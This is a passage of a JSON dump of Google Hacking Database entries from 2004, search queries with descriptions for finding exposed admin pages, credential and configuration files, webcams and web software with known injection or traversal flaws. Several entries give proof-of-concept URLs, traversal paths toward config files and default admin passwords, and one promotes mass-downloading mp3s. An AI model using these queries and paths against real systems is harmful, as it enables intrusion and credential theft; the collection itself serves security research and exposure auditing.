brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet.This is a generic search for Lotus Domino files. It identifies Domino users. Search the GBDB for more variations on this theme.", "submited": "2004-10-20", "request": "ext:nsf nsf -gov -mil", "id": 605}, {"short description": "inurl:statrep.nsf -gov", "long description": "Domino is server technology which transforms Lotus Notes into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet. This search finds statistics pages generated by Domino. Information on these pages includes Operating System, Disk space, Usernames and full path disclosure.Example:    * 1. Statistics Reports - 1. System    * 1. Statistics Reports - 2. Mail &amp; Database    * 1. Statistics Reports - 3. Communications    * 1. Statistics Reports - 4. Network    * 1. Statistics Reports - 5. Clusters    * 1. Statistics Reports - 6. Web Server &amp; Retriever    * 1. Statistics Reports - 7. Calendaring Scheduling    * 2. Alarms    * 3. Events    * 4. Spreadsheet Export    * 5. Graphs - 1. System Statistics    * 5. Graphs - 2. System Loads    * 5. Graphs - 3. System Resources    * 6. Trouble Tickets - 1. Alarm    * 6. Trouble Tickets - 2. Event    * 7. Analysis Report    * 8. File Statistics    * 9. Single Copy Object Store Statistics", "submited": "2004-10-20", "request": "inurl:statrep.nsf -gov", "id": 606}, {"short description": "inurl:log.nsf -gov", "long description": "Domino is server technology which transforms Lotus Notes into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet. This search finds Domino log files. These can be revealing, including information about dbconnect.nsf files, path information, etc.Example:    * Database-Sizes    * Database-Usage    * Mail Routing Events    * Miscellaneous Events    * NNTP Events    * Object Store Usage    * Passthru Connections    * Phone Calls-By Date    * Phone Calls-By User    * Replication Events    * Sample Billing    * Usage-By Date    * Usage-By UserExample:2004/04/14 07:51:00 AM ATTEMPT TO ACCESS DATABASE mtstore.ntf by itisdom/ITIS/ITRI was denied", "submited": "2004-10-20", "request": "inurl:log.nsf -gov", "id": 607}, {"short description": "inurl:login.php \"SquirrelMail version\"", "long description": "squirrelMail is a standards-based webmail package written in PHP4. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. SquirrelMail has all the functionality you would want from an email client, including strong MIME support, address books, and folder manipulation.", "submited": "2004-10-20", "request": "inurl:login.php \"SquirrelMail version\"", "id": 608}, {"short description": "\"Ideal BB Version: 0.1\" -idealbb.com", "long description": "Ideal BB has been a popular choice for powering web based bulletin boards and we are now proud to introduce our next generation bulletin board Ideal BB.NET. Ideal Science IdealBB is reported prone to multiple unspecified input validation vulnerabilities. These issues result from insufficient sanitization of user-supplied data. Securityfocus currently has 3 reports idealBB.", "submited": "2004-10-21", "request": "\"Ideal BB Version: 0.1\" -idealbb.com", "id": 609}, {"short description": "(inurl:81/cgi-bin/.cobalt/)  | (intext:\"Welcome to the Cobalt RaQ\")", "long description": "The famous Sun linux appliance. The default page displays this text:\"Congratulations on Choosing a Cobalt RaQ - the premier server appliance platform for web hosting. This page can easily be replaced with your own page. To replace this page, transfer your new content to the directory /home/sites/home/web\".", "submited": "2004-10-22", "request": "(inurl:81/cgi-bin/.cobalt/)  | (intext:\"Welcome to the Cobalt RaQ\")", "id": 610}, {"short description": "\"Powered by YaPig V0.92b\"", "long description": "YaPiG is reported to contain an HTML injection vulnerability. The problem is reported to present itself due to a lack of sanitization performed on certain field data.This may allow an attacker to inject malicious HTML and script code into the application.http://www.securityfocus.com/bid/11452", "submited": "2004-10-22", "request": "\"Powered by YaPig V0.92b\"", "id": 611}, {"short description": "intitle:\"toshiba network camera - User Login\"", "long description": "Web interface of Toshiba network cameras.", "submited": "2004-10-25", "request": "intitle:\"toshiba network camera - User Login\"", "id": 612}, {"short description": "inurl:\"/site/articles.asp?idcategory=\"", "long description": "Dwc_Articles is an ASP application designed to add Featured,  Recent and Popular News through an easy to use administration area.  Other features: Design Packages, Add, Modify, Deactive through HTML/Wysiwyg Editor,  Nearly all scripts suffer from possible sql injections. http://www.securityfocus.com/bid/11509", "submited": "2004-10-25", "request": "inurl:\"/site/articles.asp?idcategory=\"", "id": 613}, {"short description": "index.of.dcim", "long description": "The DCIM directory is the default name for a few brands of digital camers. This is not a big network security risk, but like netcams it can reveal juicy details if found on corporate intranets.", "submited": "2004-10-25", "request": "index.of.dcim", "id": 614}, {"short description": "intitle:\"phpremoteview\" filetype:php \"Name, Size, Type, Modify\"", "long description": "phpRemoteView is webbased filemanger with a basic shell. With this an attacker can browse the server filesystem use the online php interpreter.vendor: http://php.spb.ru/remview/ (russian)", "submited": "2004-10-26", "request": "intitle:\"phpremoteview\" filetype:php \"Name, Size,", "id": 615}, {"short description": "intitle:\"index of\" -inurl:htm -inurl:html mp3", "long description": "Yes!  I probably have should have told you guys earlier, but this is how ive been getting 100% of my mp3s.  It fricken rocks, use it and abuse it.  Downfalls to it...  a)sometimes you shouldnt include mp3 in the query and getting what you want takes several different methods of searching b)a lot of the time google gives you results and they are not there thanks to good old friend 404 c)finding stuff takes a lot of practice.  Goods...  a)ive found whole albums b)ive mass downloaded directories of hundreds of songs that i have intrest in c)its exciting seeing the results, like fining treasure.", "submited": "2004-10-20", "request": "intitle:\"index of\" -inurl:htm -inurl:html mp3", "id": 616}, {"short description": "intitle:\"Index of\" upload size parent directory", "long description": "Files uploaded through ftp by other people, sometimes you can find all sorts of things from movies to important stuff.", "submited": "2004-10-24", "request": "intitle:\"Index of\" upload size parent directory", "id": 617}, {"short description": "filetype:cgi inurl:nbmember.cgi", "long description": "vulnerable Netbilling nbmember.cgiNetbilling 'nbmember.cgi' script is reported prone to an information disclosure vulnerability. This issue may allow remote attackers to gain access to user authentication credentials and potentially sensitive configuration information.The following proof of concept is available:http://www.example.com/cgi-bin/nbmember.cgi?cmd=testhttp://www.example.com/cgi-bin/nbmember.cgi?cmd=list_all_users&amp;keyword=hereistheaccesskeywordhttp://www.securityfocus.com/bid/11504", "submited": "2004-10-26", "request": "filetype:cgi inurl:nbmember.cgi", "id": 618}, {"short description": "\"Powered by Coppermine Photo Gallery\"", "long description": "published Oct 20, 2004, updated Oct 20, 2004vulnerable:Coppermine Photo Gallery Coppermine Photo Gallery 1.0Coppermine Photo Gallery Coppermine Photo Gallery 1.1Coppermine Photo Gallery Coppermine Photo Gallery 1.2Coppermine Photo Gallery Coppermine Photo Gallery 1.2.1Coppermine Photo Gallery Coppermine Photo Gallery 1.3Coppermine Photo Gallery Coppermine Photo Gallery 1.3.1Coppermine Photo Gallery Coppermine Photo Gallery 1.3.2Coppermine Photo Gallery is reported prone to a design error that may allow users to cast multiple votes for a picture.All versions of Coppermine Photo Gallery are considered vulnerable at the moment.http://www.securityfocus.com/bid/11485", "submited": "2004-10-26", "request": "\"Powered by Coppermine Photo Gallery\"", "id": 619}, {"short description": "\"Powered by WowBB\" -site:wowbb.com", "long description": "WowBB is reportedly affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamic web content and SQL database queries.An attacker can leverage these issues to manipulate or reveal database contents through SQL injection attacks as well as carry out other attacks and steal cookie-based authentication credentials through cross-site scripting attacks.http://www.securityfocus.com/bid/11429http://www.wowbb.com/", "submited": "2004-10-26", "request": "\"Powered by WowBB\" -site:wowbb.com", "id": 620}, {"short description": "\"Powered by ocPortal\" -demo -ocportal.com", "long description": "Reportedly ocPortal is affected by a remote file include vulnerability. This issue is due to a failure of the application to sanitize user supplied URI input.An attacker might leverage this issue to run arbitrary server side script code on a vulnerable computer with the privileges of the web server process. This may potentially result in a compromise of the vulnerable computer as well as other attacks.http://www.securityfocus.com/bid/11368", "submited": "2004-10-26", "request": "\"Powered by ocPortal\" -demo -ocportal.com", "id": 621}, {"short description": "inurl:\"slxweb.dll\"", "long description": "salesLogix is the Customer Relationship Management solution thatdrives  sales performance in small to medium-sized businesses through Sales, Marketing, and Customer Support automation and back-office integration.The problem:By manipulating the cookies used by the Web Client, it is possible totrick the  server into authenticating a remote user as the CRM administrator without requiring a password.  It is also possible to perform SQL injection attacks on the SQL serverthat is used as the data store for the SalesLogix CRM system, reveal detailed error reports contained in HTTP headers and disclose the real filesystem paths to various SalesLogix directories. The SalesLogix server itself is vulnerable to an attack that wouldallow a malicious user to obtain the username and password used to access the SQL server used as a data store. The disclosed username and password always have read/write permissions on the database. Another vulnerability in the SalesLogix server allows anunauthenticated user to upload arbitrary files to the server in any directory (s)he chooses.http://www.securityfocus.com/bid/11450", "submited": "2004-10-26", "request": "inurl:\"slxweb.dll\"", "id": 622}, {"short description": "\"Powered by DMXReady Site Chassis Manager\" -site:dmxready.com", "long description": "It is reported that DMXReady Site Chassis Manager is susceptible to two remotely exploitable input validation vulnerabilities. These vulnerabilities are due to a failure of the application to properly sanitize user-supplied data.The first issue is an unspecified cross-site scripting vulnerability. This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials or other attacks.The second issue is an unspecified SQL injection vulnerability. It may be possible for a remote user to inject arbitrary SQL queries into the underlying database used by the application. This could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.Successful exploitation could result in compromise of the application, disclosure or modification of data or may permit an attacker to exploit vulnerabilities in the underlying database implementation.", "submited": "2004-10-26", "request": "\"Powered by DMXReady Site Chassis Manager\" -site:dmxready.com", "id": 623}, {"short description": "\"Powered by My Blog\" intext:\"FuzzyMonkey.org\"", "long description": "FuzzyMonkey My Blog is vulnerable to multiple input validation vulnerabilities. These issues are caused by a failure to validate and filter user-supplied strings before including them in dynamic Web page content.An attacker could leverage these issues to carry out cross-site scripting attacks against unsuspecting users, facilitating theft of cookie-based authentication credentials as well as other attacks.vulnerable FuzzyMonkey My Blog 1.15FuzzyMonkey My Blog 1.16FuzzyMonkey My Blog 1.17FuzzyMonkey My Blog 1.18FuzzyMonkey My Blog 1.19FuzzyMonkey My Blog 1.20not vulnerable FuzzyMonkey My Blog 1.21 They also have several other scripts, which may or may not be vulnerable. But remember Murphy's law also applies to software writers.# My Photo Gallery (picture and file sharing software)# My Calendar (quick and easy web calendar)# My Voting Script# My Guestbookhttp://www.securityfocus.com/bid/11325", "submited": "2004-10-26", "request": "\"Powered by My Blog\" intext:\"FuzzyMonkey.org\"", "id": 624}, {"short description": "inurl:wiki/MediaWiki", "long description": "MediaWiki is reported prone to a cross-site scripting vulnerability. This issue arises due to insufficient sanitization of user-supplied data. A remote attacker may exploit this vulnerability to execute arbitrary HTML and script code in the browser of a vulnerable user.bugtraq id 11480objectclass Input Validation Errorcve CVE-MAP-NOMATCHremote Yeslocal Nopublished Oct 18, 2004updated Oct 20, 2004vulnerable MediaWiki MediaWiki 1.3MediaWiki MediaWiki 1.3.1MediaWiki MediaWiki 1.3.2MediaWiki MediaWiki 1.3.3MediaWiki MediaWiki 1.3.4MediaWiki MediaWiki 1.3.5MediaWiki MediaWiki 1.3.6not vulnerable MediaWiki MediaWiki 1.3.7", "submited": "2004-10-26", "request": "inurl:wiki/MediaWiki", "id": 625}, {"short description": "\"inurl:/site/articles.asp?idcategory=\"", "long description": "Dwc_Articles, is an ASP application designed to add Featured, Recent and Popular News through an easy to use administration area. Other features: Design Packages, Add, Modify, Deactive through HTML/Wysiwyg Editor, Upload, categories, Multiple Users and more.Nearly all scripts suffer from possible sql injections. This may lead an attacker to change websites content or even worse, a login as an admin.vulnerable:", "submited": "2004-10-26", "request": "\"inurl:/site/articles.asp?idcategory=\"", "id": 626}, {"short description": "\"Enter ip\" inurl:\"php-ping.php\"", "long description": "It has been reported that php-ping may be prone to a remote command execution vulnerability that may allow remote attackers to execute commands on vulnerable systems. The problem exists due to insufficient sanitization of shellmetacharacters via the 'count' parameter of php-ping.php script.report: http://www.securityfocus.com/bid/9309/info/sample: http://img64.exs.cx/my.php?loc=img64&amp;image=phpping.jpg", "submited": "2004-10-26", "request": "\"Enter ip\" inurl:\"php-ping.php\"", "id": 627}, {"short description": "\"File Upload Manager v1.3\" \"rename to\"", "long description": "thepeak file upload manager let you manage your webtree with up and downloading files.", "submited": "2004-10-27", "request": "\"File Upload Manager v1.3\" \"rename to\"", "id": 628}, {"short description": "inurl:click.php intext:PHPClickLog", "long description": "A script written in PHP 4 which logs a user's statistics when they click on a link.  The log is stored in a flatfile (text) database and can be viewed/inspected through an administration section.", "submited": "2004-10-27", "request": "inurl:click.php intext:PHPClickLog", "id": 629}, {"short description": "intitle:welcome.to.horde", "long description": "Horde Mail is web based email software, great for checking messages on the road. Several vulnerabilities were reported to Security Focus.", "submited": "2004-10-27", "request": "intitle:welcome.to.horde", "id": 630}, {"short description": "\"BlackBoard 1.5.1-f | 2003-4 by Yves Goergen\"", "long description": "bugtraq id 11336objectclass Input Validation Errorcve CVE-MAP-NOMATCHremote Yeslocal Nopublished Oct 06, 2004updated Oct 06, 2004vulnerable BlackBoard Internet Newsboard System BlackBoard Internet Newsboard System 1.5.1BlackBoard Internet Newsboard System is reported prone to a remote file include vulnerability. This issue presents itself because the application fails to sanitize user-supplied data properly. This issue may allow an attacker to include malicious files containing arbitrary script code to be executed on a vulnerable computer.BlackBoard Internet Newsboard System version 1.5.1 is reported prone to this vulnerability. It is possible that prior versions are affected as well.", "submited": "2004-10-27", "request": "\"BlackBoard 1.5.1-f | 2003-4 by Yves Goergen\"", "id": 631}, {"short description": "intitle:\"AppServ Open Project\" -site:www.appservnetwork.com", "long description": "AppServ is the Apache/PHP/MySQL open source software installer packages. This normally includes convenient links to phpMyAdmin and phpInfo() pages.", "submited": "2004-10-31", "request": "intitle:\"AppServ Open Project\" -site:www.appservnetwork.com", "id": 632}, {"short description": "\"powered by YellDL\"", "long description": "Finds websites using YellDL (or also known as YellDownLoad), a download tracker written in PHP. Unfortunately this downloader downloads everything you want to, like its own files too:http://xxxxxxxxxx/download.php?f=../download&amp;e=phpBy guessing some could download information which shoudln't get out of the server (think of ../phpMyAdmin/config.php or other stuff - no need to say that lazy people use same passwords for their DB- and FTP-login.Another search to find this software is:\"You are downloading *\" \"you are downloader number * of this file\"", "submited": "2004-10-31", "request": "\"powered by YellDL\"", "id": 633}, {"short description": "intitle:\"index of\" intext:\"content.ie5\"", "long description": "This dork indicates the \"Local settings\" dir in most cases, and browseble server directories in general.", "submited": "2004-10-31", "request": "intitle:\"index of\" intext:\"content.ie5\"", "id": 634}, {"short description": "intitle:\"php icalendar administration\" -site:sourceforge.net", "long description": "PHP iCalendar is a php-based iCal file parser. Its based on v2.0 of the IETF spec. It displays iCal files in a nice logical, clean manner with day, week, month, and year navigation.This reveals the administration interface.", "submited": "2004-10-31", "request": "intitle:\"php icalendar administration\" -site:sourceforge.net", "id": 635}, {"short description": "intitle:\"Web Server Statistics for ****\"", "long description": "These are www analog webstat reports. The failure report shows information leakage about database drivers, admin login pages,  SQL statements, etc.", "submited": "2004-10-31", "request": "intitle:\"Web Server Statistics for ****\"", "id": 636}, {"short description": "filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net", "long description": "PHP iCalendar is a php-based iCal file parser. Its based on v2.0 of the IETF spec. It displays iCal files in a nice logical, clean manner with day, week, month, and year navigationThis reveals the RSS info for the user calendars.", "submited": "2004-10-31", "request": "filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net", "id": 637}, {"short description": "intitle:\"php icalendar administration\" -site:sourceforge.net", "long description": "This is the adminstration login portal search for PHP iCalendar. It is compatible with Evolution and clients for other platforms. Admin uuthentication has two choices, FTP and Internal. For the latter the defaults are \"admin/admin\".There is also a more generic search in the GHDB that an attacker use and then modify to ../admin.php to reach the adminstration pages. Access to adminstration allows an attacker to upload new ICS files or delete present ones.", "submited": "2004-10-31", "request": "intitle:\"php icalendar administration\" -site:sourceforge.net", "id": 638}, {"short description": "intitle:phpMyAdmin \"Welcome to phpMyAdmin ***\" \"running on * as root@*\"", "long description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fieldsThe servers found here can be acessed without authentication. This search is restricted to NON-ROOT users! See ID 510 for a root user search.", "submited": "2004-10-31", "request": "intitle:phpMyAdmin \"Welcome to phpMyAdmin ***\" \"running on * as root@*\"", "id": 639}, {"short description": "\"please visit\" intitle:\"i-Catcher Console\" Copyright \"iCode Systems\"", "long description": "CCTV webcams by ICode.", "submited": "2004-11-03", "request": "\"please visit\" intitle:\"i-Catcher Console\" Copyright \"iCode Systems\"", "id": 640}, {"short description": "inurl:irc filetype:cgi cgi:irc", "long description": "CGIIRC is a web-based IRC client. Using a non-transparent proxy an attacker could communicate anonymously by sending direct messages to a contact. Most servers are restricted to one irc server and one or more default channels and will not let allow access to anything else.", "submited": "2004-11-04", "request": "inurl:irc filetype:cgi cgi:irc", "id": 641}, {"short description": "natterchat inurl:home.asp -site:natterchat.co.uk", "long description": "NatterChat is a webbased chat system written in ASP.An SQL injection vulnerability is identified in the application that may allow attackers to pass malicious input to database queries, resulting in the modification of query logic or other attacks. This allows the attacker to gain admin access...", "submited": "2004-11-05", "request": "natterchat inurl:home.asp -site:natterchat.co.uk", "id": 642}, {"short description": "filetype:inf inurl:capolicy.inf", "long description": "The CAPolicy.inf file provides Certificate Servicces configuration information, which is read during initial CA installation an whenever you renew a CA certificate. The CApolicy.inf file defines settings specific to root CAs, as well as settings that affect all CAs in the CA hierarchiy.", "submited": "2004-11-05", "request": "filetype:inf inurl:capolicy.inf", "id": 643}, {"short description": "\"Certificate Practice Statement\" inurl:(PDF | DOC)", "long description": "Certificate Practice Statement  (CPS)A CPS defines the measures taken to secure CA operation and the management of CA-issued certificates. You can consider a CPS to be an agreement between the organization managing the CA and the people relying on on the certificates issued by the CA.", "submited": "2004-11-05", "request": "\"Certificate Practice Statement\" inurl:(PDF | DOC)", "id": 644}, {"short description": "filetype:cgi inurl:cachemgr.cgi", "long description": "cachemgr.cgi is a management interface for the Squid proxy service. It was installed by default in /cgi-bin by RedHat Linux 5.2 and 6.0 installed with Squid. This script prompts for a host and port which it then attempts to connect to. If a web server, such as apache, is running this can be used to connect to arbitrary hosts and ports, allowing for potential use as an intermediary in denial of service attacks, proxied port scans, etc. Interpreting the output of the script can allow the attacker to determine whether or not a connection was established.", "submited": "2004-11-04", "request": "filetype:cgi inurl:cachemgr.cgi", "id": 645}, {"short description": "inurl:chap-secrets -cvs", "long description": "linux vpns store their usernames and passwords for CHAP authentification in a file called \"chap-secrets\" where the usernames and the passwords are in cleartext.", "submited": "2004-11-06", "request": "inurl:chap-secrets -cvs", "id": 646}, {"short description": "inurl:pap-secrets -cvs", "long description": "linux vpns store there usernames and passwords for PAP authentification in a file called \"pap-secrets\" where the usernames and the passwords are in cleartext.", "submited": "2004-11-06", "request": "inurl:pap-secrets -cvs", "id": 647}, {"short description": "filetype:ini inurl:\"serv-u.ini\"", "long description": "serv-U is a ftp/administration server for Windows. This file leaks info about the version, username and password. Passwords are in encrypted, but there is a decryption program available on the Net. An attacker could use this search to upload dangerous code etc.", "submited": "2004-11-06", "request": "filetype:ini inurl:\"serv-u.ini\"", "id": 648}, {"short description": "inurl:\"forumdisplay.php\" +\"Powered by: vBulletin Version 3.0.0..4\"", "long description": "vBulletin is reported vulnerable to a remote SQL injection vulnerability. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. An attacker may exploit this issue to manipulate and inject SQL queries onto the underlying database. It will be possible to leverage this issue to steal database contents including administrator password hashes and user credentials as well as to make attacks against the underlying database. Versions 3.0 through to 3.0.3 are reportedly affected by this issue.http://www.securityfocus.com/bid/11193", "submited": "2004-11-05", "request": "inurl:\"forumdisplay.php\" +\"Powered by: vBulletin Version 3.0.0..4\"", "id": 649}, {"short description": "WebControl intitle:\"AMX NetLinx\"", "long description": "AMX Netlink is a server appliance which connects various devices like a beamer, laptop or video recorder to the internet.", "submited": "2004-11-06", "request": "WebControl intitle:\"AMX NetLinx\"", "id": 650}, {"short description": "inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx", "long description": "Windows Small Business Server 2003: The network configuration page is called \"ConnectComputer/precheck.htm \" and the Remote Web login page is called \"remote/logon.aspx\".", "submited": "2004-11-06", "request": "inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx", "id": 651}, {"short description": "inurl:aol*/_do/rss_popup?blogID=", "long description": "AOL Journals BlogID Incrementing Discloses Account Names and Email AddressesAOL Journals is basically \"America Online's version of a blog (weblog) for AOL members/subscribers. A vulnerability in AOL Journals BlogID allows an attacker to numbers provided to the program and enumerate a list of AOL members/subscribers and their corresponding email.", "submited": "2004-11-06", "request": "inurl:aol*/_do/rss_popup?blogID=", "id": 652}, {"short description": "(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)", "long description": "This is a \"double dork\" finds two different shopping carts, both vulnerable1) Cyber-Village Online Consulting Shopping CartCyber-Village's script is known to not sanitize the user input properly which leads to code execution problems.2) Hassan Consulting's Shopping CartFor Hassan's cart it is reported that a remote user can request the 'shop.cfg' and that the script allows directory traversal.", "submited": "2004-11-07", "request": "(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)", "id": 653}, {"short description": "inurl:newsdesk.cgi? inurl:\"t=\"", "long description": "Newsdesk is a cgi script designed to allow remote administration of website news headlines.Due to a failure in the sanitization of parameters a remote user can reveal the contents of any file. This allows the attacker to download user and password data.It is furthermore known that it is possible to run system commands remotely.", "submited": "2004-11-07", "request": "inurl:newsdesk.cgi? inurl:\"t=\"", "id": 654}, {"short description": "\"Switch to table format\" inurl:table|plain", "long description": "This is an index page of OReilly WebSite Professional.WebsitePro was developed by O'reily and disconinued on August 2001. The product was then continued by Deerfield.com", "submited": "2004-11-07", "request": "\"Switch to table format\" inurl:table|plain", "id": 655}, {"short description": "intitle:\"Home\" \"Xerox Corporation\" \"Refresh Status\"", "long description": "CentreWare Internet Services is an interactive service that uses Internet technology to extend the capabilities of your DocuPrint printer using Internet technology. An HTTP server application developed by Xerox is resident on your network-enabled DocuPrint printer. This HTTP server provides access to advanced services for the installation, configuration, and management of your DocuPrint printer.", "submited": "2004-11-07", "request": "intitle:\"Home\" \"Xerox Corporation\" \"Refresh Status\"", "id": 656}, {"short description": "inurl:webutil.pl", "long description": "webutil.pl is a web interface to the following services:* ping* traceroute* whois* finger* nslookup* host* dnsquery* dig* calendar* uptime", "submited": "2004-11-07", "request": "inurl:webutil.pl", "id": 657}, {"short description": "\"About Mac OS Personal Web Sharing\"", "long description": "Mac OS Personal Web Sharing allows Mac OS users to share Folders over the Web.If you open this page you will shown the system's major version as requirement.", "submited": "2004-11-07", "request": "\"About Mac OS Personal Web Sharing\"", "id": 658}, {"short description": "ext:conf NoCatAuth -cvs", "long description": "NoCatAuth configuration file. This reveals the configuration details of wirless gateway including ip addresses, device names and pathes.", "submited": "2004-11-07", "request": "ext:conf NoCatAuth -cvs", "id": 659}, {"short description": "inurl:\"putty.reg\"", "long description": "This registry dump contains putty saved session data. SSH servers the according usernames and proxy configurations are stored here.", "submited": "2004-11-07", "request": "inurl:\"putty.reg\"", "id": 660}, {"short description": "intitle:\"Icecast Administration Admin Page\"", "long description": "Icecast streaming audio server web admin.This gives you a list of connected clients. Interesting way of finding attackable client computers.", "submited": "2004-11-07", "request": "intext:\"Icecast Administration Admin Page\" intitle:\"Icecast Administration Admin Page\"", "id": 661}, {"short description": "inurl:/adm-cfgedit.php", "long description": "PhotoPost Pro is photo gallery system. This dork finds its installation page.You can use this page to set all parameters of the system. The existing data is not shown :(", "submited": "2004-11-07", "request": "inurl:/adm-cfgedit.php", "id": 662}, {"short description": "\"liveice configuration file\" ext:cfg -site:sourceforge.net", "long description": "This finds the liveice.cfg file  which contains all configuration data for an Icecast server. Passwords are saved unencrypted in this file.", "submited": "2004-11-08", "request": "\"liveice configuration file\" ext:cfg -site:sourceforge.net", "id": 663}, {"short description": "inurl:portscan.php \"from Port\"|\"Port Range\"", "long description": "This is general search for online port scanners which accept any IP. It does not find a specific scanner script, but searches for a pattern which will match some more scanners.", "submited": "2004-11-12", "request": "inurl:portscan.php \"from Port\"|\"Port Range\"", "id": 664}, {"short description": "intitle:\"sysinfo * \" intext:\"Generated by Sysinfo * written by The Gamblers.\"", "long description": "Lots of information leakage on these pages about active network services, server info, network connections, etc..", "submited": "2004-11-12", "request": "intitle:\"sysinfo * \" intext:\"Generated by Sysinfo * written by The Gamblers.\"", "id": 665}, {"short description": "filetype:pst pst -from -to -date", "long description": "Finds Outlook PST files which can contain emails, calendaring and address information.", "submited": "2004-11-12", "request": "filetype:pst pst -from -to -date", "id": 666}, {"short description": "intitle:Configuration.File inurl:softcart.exe", "long description": "This search finds configuration file errors within the softcart application. It includes the name of the configuration file and discloses server file paths.", "submited": "2004-11-13", "request": "intitle:Configuration.File inurl:softcart.exe", "id": 667}, {"short description": "inurl:technote inurl:main.cgi*filename=*", "long description": "http://www.securityfocus.com/bid/2156/discussion/ Remote command execution vulnerability in the filename parameter.", "submited": "2004-11-13", "request": "inurl:technote inurl:main.cgi*filename=*", "id": 668}, {"short description": "intext:\"Ready with 10/100T Ethernet\"", "long description": "Xerox 860 and 8200 Printers.", "submited": "2004-11-13", "request": "intext:\"Ready with 10/100T Ethernet\"", "id": 669}, {"short description": "intext:\"UAA (MSB)\"  Lexmark -ext:pdf", "long description": "Lexmark printers (T620, T522, Optra T614, E323, T622, Optra T610, Optra T616, T520 and Optra S 1855)", "submited": "2004-11-13", "request": "intext:\"UAA (MSB)\"  Lexmark -ext:pdf", "id": 670}, {"short description": "intitle:\"Welcome to Your New Home Page!\" \"by the Debian release\"", "long description": "This finds the default Apache page on Debian installs.", "submited": "2004-11-13", "request": "intitle:\"Welcome to Your New Home Page!\" \"by the Debian release\"", "id": 671}, {"short description": "\"intitle:Index.Of /\" stats merchant cgi-* etc", "long description": "This search looks for indexes with the following subdirectories: stats, merchant, online-store and cgi-local or cgi-bin. These servers have a shopping cart application called softcart in their cgi-local or cgi-bin directory. Reportedly, it is possible to execute arbitrary code by passing a malformed CGI parameter in an HTTP GET request. This issue is known to affect SoftCart version 4.00b.", "submited": "2004-11-07", "request": "\"intitle:Index.Of /\" stats merchant cgi-* etc", "id": 672}, {"short description": "\"running: Nucleus v3.1\" -.nucleuscms.org -demo", "long description": "Multiple unspecified vulnerabilities reportedly affect Nucleus CMS. A remote attacker may leverage these issues to steal cookie-based authentication credentials, reveal sensitive data and corrupt database contents. http://www.securityfocus.com/bid/11631", "submited": "2004-11-12", "request": "\"running: Nucleus v3.1\" -.nucleuscms.org -demo", "id": 673}, {"short description": "\"intitle:Cisco Systems, Inc. VPN 3000 Concentrator\"", "long description": "The Cisco VPN 3000 Concentrator is a remote access VPN. The 'Concentrator'  is a piece of hardware that manages a companies VPN's. This google dork searches for the Concentrators login portal for remote access. With the correct username and password an attacker can '0wn' their Concentrator; i.e. be able to delete, copy, read, configure anything on the Concentrator.", "submited": "2004-11-09", "request": "\"intitle:Cisco Systems, Inc. VPN 3000 Concentrator\"", "id": 674}, {"short description": "\"driven by: ASP Message Board\"", "long description": "Multiple unspecified vulnerabilities reportedly affect the Infusium ASP Message Board. A remote attacker may leverage these issues to steal cookie-based authentication credentials, reveal sensitive data and corrupt database contents. vulnerable Infuseum ASP Message Board 2.2.1 cAdding the 2.2.1c seems to filter out some good positives, so I left it out.", "submited": "2004-11-12", "request": "\"driven by: ASP Message Board\"", "id": 675}, {"short description": "ext:asp inurl:DUgallery intitle:\"3.0\" -site:dugallery.com -site:duware.com", "long description": "The MS access database can be downloaded from inside the docroot. The user table holds the admin password in plain text. Possible locations for the dugallery database are:http://xx/.../DUgallery/database/dugallery.mdbhttp://xx/.../DUgallery//_private/DUgallery.mdbhttp://www.securitytracker.com/alerts/2004/Nov/1012201.html", "submited": "2004-11-16", "request": "ext:asp inurl:DUgallery intitle:\"3.0\" -site:dugall", "id": 676}, {"short description": "ext:asp \"powered by DUForum\" inurl:(messages|details|login|default|register) -site:duware.com", "long description": "DUForum is one of those free forum software packages. The database location is determined by the config file \"connDUforumAdmin.asp\", but the installation instructions don't recommend changing it. Ouch..Database location is: http://server/duforum/_private/DUforum.mdb", "submited": "2004-11-16", "request": "ext:asp \"powered by DUForum\" inurl:(messages|details|login|default|register) -site:duware.com", "id": 677}, {"short description": "intext:\"enable secret 5 $\"", "long description": "sometimes people make mistakes and post their cisco configs on \"help sites\" and don't edit the sensitive fields first. Don't forget to also query Google Groups for this string.", "submited": "2004-11-16", "request": "intext:\"enable secret 5 $\"", "id": 678}, {"short description": "inurl:postfixadmin intitle:\"postfix admin\" ext:php", "long description": "Postfix Admin login pages. Duh.", "submited": "2004-11-16", "request": "inurl:postfixadmin intitle:\"postfix admin\" ext:php", "id": 679}, {"short description": "ext:cgi inurl:editcgi.cgi inurl:file=", "long description": "This was inspired by the K-Otic report. Only two results at time of writing. The cgi script lets you view any file on the system, including /etc/.. (guess it ;)http://www.k-otik.com/exploits/08242004.Axis.sh.php", "submited": "2004-11-16", "request": "ext:cgi inurl:editcgi.cgi inurl:file=", "id": 680}, {"short description": "inurl:axis-cgi", "long description": "Just another search string to detect the infamous Axis netcams. This company actually changed the generic /cgi-bin/ directory name to /axis-cgi/, making it easier to d0rk them ;)", "submited": "2004-11-16", "request": "inurl:axis-cgi", "id": 681}, {"short description": "filetype:ns1 ns1", "long description": "Netstunbler files contain information about the wireless network. For a cleanup add stuff like: +\"Creator\" +\"Format\" +\"DateGMT\".", "submited": "2004-11-16", "request": "filetype:ns1 ns1", "id": 682}, {"short description": "\"Starting SiteZAP 